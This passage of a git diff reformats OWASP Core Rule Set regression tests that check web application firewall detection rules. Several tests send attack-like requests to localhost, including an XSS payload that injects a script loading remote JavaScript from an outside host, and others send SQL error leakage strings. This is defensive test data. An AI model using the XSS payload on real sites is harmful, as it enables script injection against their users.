"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-330 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_id: 330 desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" diff --git a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml index 33c049be4..96009a36e 100644 --- a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml +++ b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml @@ -1,92 +1,86 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "949110.yaml" description: | Test whether the inbound blocking mechanism works by testing whether rule 949110 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking rule to be triggered. +rule_id: 949110 tests: - - test_title: 949110-1 + - test_id: 1 desc: Test is basically identical to 941100-1 (XSS positive test in phase 2) but here we assert that the inbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "949110" - - test_title: 949110-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "949110" + - test_id: 2 desc: Test is basically identical to 941100-4 (XSS negative test in phase 2) but here we assert that inbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Referer: http://www.coreruleset.org - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "949110" - - test_title: 949110-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Referer: http://www.coreruleset.org + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: id "949110" + - test_id: 3 desc: Test is basically identical to 920100-9 (protocol enforcement negative test in phase 1) but here we assert that the inbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "OPTIONS" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/options" - version: "HTTP/1.1" - output: - no_log_contains: "id \"949110\"" - - test_title: 949110-4 + - input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/options" + version: "HTTP/1.1" + output: + no_log_contains: "id \"949110\"" + - test_id: 4 desc: Test is basically identical to 920100-10 (protocol enforcement positive test in phase 1) but here we assert that inbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "REALLYLONGUNREALMETHOD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"949110\"" - - test_title: 949110-5 + - input: + dest_addr: "127.0.0.1" + method: "REALLYLONGUNREALMETHOD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"949110\"" + - test_id: 5 desc: Test is basically identical to 949110-0 (see above) but here we assert that the scores are summed up and reported properly stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: " + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: " diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml index b6df65d0c..8880834b0 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951110.yaml" description: "Regression tests for rule 951110" +rule_id: 951110 tests: - - test_title: 951110-1 + - test_id: 1 desc: "Matching Microsoft Access SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"} - output: - log_contains: "id \"951110\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"} + output: + log_contains: "id \"951110\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml index 1c9318bd6..0f6f70f3f 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml @@ -1,29 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951120.yaml" description: "Regression tests for rule 951120" +rule_id: 951120 tests: - - test_title: 951120-1 + - test_id: 1 desc: "Matching Oracle SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"} - - output: - log_contains: "id \"951120\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"} + output: + log_contains: "id \"951120\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml index a7c83eff3..04d9d75a2 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951130.yaml" description: "Regression tests for rule 951130" +rule_id: 951130 tests: - - test_title: 951130-1 + - test_id: 1 desc: "Matching DB2 SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"} - output: - log_contains: "id \"951130\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"} + output: + log_contains: "id \"951130\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml index c55031406..2ade0e0ad 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951140.yaml" description: "Regression tests for rule 951140" +rule_id: 951140 tests: - - test_title: 951140-1 + - test_id: 1 desc: "Matching EMC SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: \"A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in\""} - output: - log_contains: "id \"951140\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: \"A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in\""} + output: + log_contains: "id \"951140\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml index 2e02f92f5..de3cb5a23 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951150.yaml" description: "Regression tests for rule 951150" +rule_id: 951150 tests: - - test_title: 951150-1 + - test_id: 1 desc: "Matching firebird SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"} - output: - log_contains: "id \"951150\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"} + output: + log_contains: "id \"951150\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml index 088e2d36f..cfbeb2a88 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951160.yaml" description: "Regression tests for rule 951160" +rule_id: 951160 tests: - - test_title: 951160-1 + - test_id: 1 desc: "Matching Frontbase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."} - output: - log_contains: "id \"951160\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."} + output: + log_contains: "id \"951160\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml index 60ad4b95f..cc0faad55 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951170.yaml" description: "Regression tests for rule 951170" +rule_id: 951170 tests: - - test_title: 951170-1 + - test_id: 1 desc: "Matching hsqldb SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"} - output: - log_contains: "id \"951170\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"} + output: + log_contains: "id \"951170\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml index 7ac83ba06..a9b5c0d5d 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951180.yaml" description: "Regression tests for rule 951180" +rule_id: 951180 tests: - - test_title: 951180-1 + - test_id: 1 desc: "Matching informix SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."} - output: - log_contains: "id \"951180\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."} + output: + log_contains: "id \"951180\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml index b1ca7c7b1..21e7d6d8a 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951190.yaml" description: "Regression tests for rule 951190" +rule_id: 951190 tests: - - test_title: 951190-1 + - test_id: 1 desc: "Matching ingres SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"} - output: - log_contains: "id \"951190\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"} + output: + log_contains: "id \"951190\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml index a190b55e2..ae89d41d8 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951200.yaml" description: "Regression tests for rule 951200" +rule_id: 951200 tests: - - test_title: 951200-1 + - test_id: 1 desc: "Matching interbase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."} - output: - log_contains: "id \"951200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."} + output: + log_contains: "id \"951200\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml index f65083eb9..740acf8f9 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951210.yaml" description: "Regression tests for rule 951210" +rule_id: 951210 tests: - - test_title: 951210-1 + - test_id: 1 desc: "Matching maxDB SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"} - output: - log_contains: "id \"951210\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"} + output: + log_contains: "id \"951210\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml index 18d37f411..b92a07a32 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml @@ -1,50 +1,46 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951220.yaml" description: "Regression tests for rule 951220" +rule_id: 951220 tests: - - test_title: 951220-1 + - test_id: 1 desc: "Matching mssql SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"} - output: - log_contains: "id \"951220\"" - - - test_title: 951220-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 